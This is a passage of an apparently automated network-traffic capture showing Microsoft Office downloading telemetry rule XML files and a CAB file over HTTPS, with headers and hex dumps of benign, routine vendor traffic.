                                          Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                          ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                          MS-CorrelationId: d0acc79d-4aad-41ac-9645-54026857ed18
                                          MS-RequestId: 2b1844cd-5859-422e-9a8d-6a32c19e02ab
                                          MS-CV: HaCa52j7hE+oPmlg.0
                                          X-Microsoft-SLSClientCache: 1440
                                          Content-Disposition: attachment; filename=environment.cab
                                          X-Content-Type-Options: nosniff
                                          Date: Mon, 18 Nov 2024 22:44:45 GMT
                                          Connection: close
                                          Content-Length: 30005
                                          2024-11-18 22:44:46 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                                          Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                                          2024-11-18 22:44:46 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                                          Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26192.168.2.45730413.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:44:46 UTC192OUTGET /rules/rule120600v4s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:44:46 UTC515INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:44:46 GMT
                                          Content-Type: text/xml
                                          Content-Length: 2980
                                          Connection: close
                                          Vary: Accept-Encoding
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                          ETag: "0x8DC582BA80D96A1"
                                          x-ms-request-id: ec16a966-001e-0014-49c6-375151000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224446Z-16547b76f7ff9zf4hC1DFW2pfc00000004300000000055g9
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache: TCP_HIT
                                          X-Cache-Info: L1_T2
                                          Accept-Ranges: bytes
                                          2024-11-18 22:44:46 UTC2980INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27192.168.2.45730713.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:44:46 UTC192OUTGET /rules/rule120609v0s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:44:46 UTC470INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:44:46 GMT
                                          Content-Type: text/xml
                                          Content-Length: 408
                                          Connection: close
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                          ETag: "0x8DC582BB56D3AFB"
                                          x-ms-request-id: 6c84f393-101e-007a-65a5-36047e000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224446Z-16547b76f7ff9zf4hC1DFW2pfc000000043g000000003hm7
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2024-11-18 22:44:46 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28192.168.2.45730313.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:44:46 UTC192OUTGET /rules/rule224902v2s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:44:46 UTC470INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:44:46 GMT
                                          Content-Type: text/xml
                                          Content-Length: 450
                                          Connection: close
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT
                                          ETag: "0x8DC582BD4C869AE"
                                          x-ms-request-id: 57a2975a-501e-0078-749b-3706cf000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224446Z-16547b76f7fp6s5dhC1DFWe28g00000003sg000000003py2
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2024-11-18 22:44:46 UTC450INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          29192.168.2.45730613.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:44:46 UTC192OUTGET /rules/rule120608v0s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:44:46 UTC494INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:44:46 GMT
                                          Content-Type: text/xml
                                          Content-Length: 2160
                                          Connection: close
                                          Vary: Accept-Encoding
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                          ETag: "0x8DC582BA3B95D81"
                                          x-ms-request-id: 1270a440-201e-00aa-78a0-373928000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224446Z-r18f44ddb694v9hbhC1DFW4shn00000000hg000000009n4z
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2024-11-18 22:44:46 UTC2160INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          30192.168.2.45730513.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:44:46 UTC193OUTGET /rules/rule120402v21s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:44:46 UTC494INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:44:46 GMT
                                          Content-Type: text/xml
                                          Content-Length: 3788
                                          Connection: close
                                          Vary: Accept-Encoding
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                          ETag: "0x8DC582BAC2126A6"
                                          x-ms-request-id: 3b7f0400-201e-0071-256d-38ff15000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224446Z-164f84587bfjxw6fhC1DFWq94400000006ng0000000080yr
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2024-11-18 22:44:46 UTC3788INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          31192.168.2.45730813.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:44:47 UTC192OUTGET /rules/rule120610v0s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:44:47 UTC470INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:44:47 GMT
                                          Content-Type: text/xml
                                          Content-Length: 474
                                          Connection: close
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT
                                          ETag: "0x8DC582B9964B277"
                                          x-ms-request-id: fc33b24f-c01e-00a2-3209-372327000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224447Z-1866b5c5fbbr78bbhC1DFWqz2n00000006m000000000caxc
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2024-11-18 22:44:47 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          32192.168.2.45731013.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:44:47 UTC192OUTGET /rules/rule120612v0s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:44:47 UTC491INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:44:47 GMT
                                          Content-Type: text/xml
                                          Content-Length: 471
                                          Connection: close
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT
                                          ETag: "0x8DC582BB10C598B"
                                          x-ms-request-id: 6cd7b429-001e-0034-76a2-37dd04000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224447Z-17cf5b775c482xjhhC1DFWhqac00000000d0000000002x5e
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache-Info: L1_T2
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2024-11-18 22:44:47 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          33192.168.2.45731113.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:44:47 UTC192OUTGET /rules/rule120613v0s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:44:47 UTC491INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:44:47 GMT
                                          Content-Type: text/xml
                                          Content-Length: 632
                                          Connection: close
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                          ETag: "0x8DC582BB6E3779E"
                                          x-ms-request-id: 0c33812d-401e-005b-6489-389c0c000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224447Z-164f84587bftbpb6hC1DFWm4kg000000053g00000000ytkx
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache: TCP_HIT
                                          X-Cache-Info: L1_T2
                                          Accept-Ranges: bytes
                                          2024-11-18 22:44:47 UTC632INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          34192.168.2.45730913.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:44:47 UTC192OUTGET /rules/rule120611v0s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:44:47 UTC491INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:44:47 GMT
                                          Content-Type: text/xml
                                          Content-Length: 415
                                          Connection: close
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT
                                          ETag: "0x8DC582B9F6F3512"
                                          x-ms-request-id: dc576d04-601e-003d-79ef-396f25000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224447Z-16547b76f7f7zzl8hC1DFWmtag0000000560000000013kn2
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache: TCP_HIT
                                          X-Cache-Info: L1_T2
                                          Accept-Ranges: bytes
                                          2024-11-18 22:44:47 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          35192.168.2.45731213.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:44:47 UTC192OUTGET /rules/rule120614v0s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:44:47 UTC470INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:44:47 GMT
                                          Content-Type: text/xml
                                          Content-Length: 467
                                          Connection: close
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                          ETag: "0x8DC582BA6C038BC"
                                          x-ms-request-id: 4ab292c7-f01e-005d-268a-3713ba000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224447Z-164f84587bfs5tz9hC1DFW9a3w00000006n00000000011uq
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2024-11-18 22:44:47 UTC467INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          36192.168.2.45731313.107.246.45443
                                          TimestampBytes transferredDirectionData
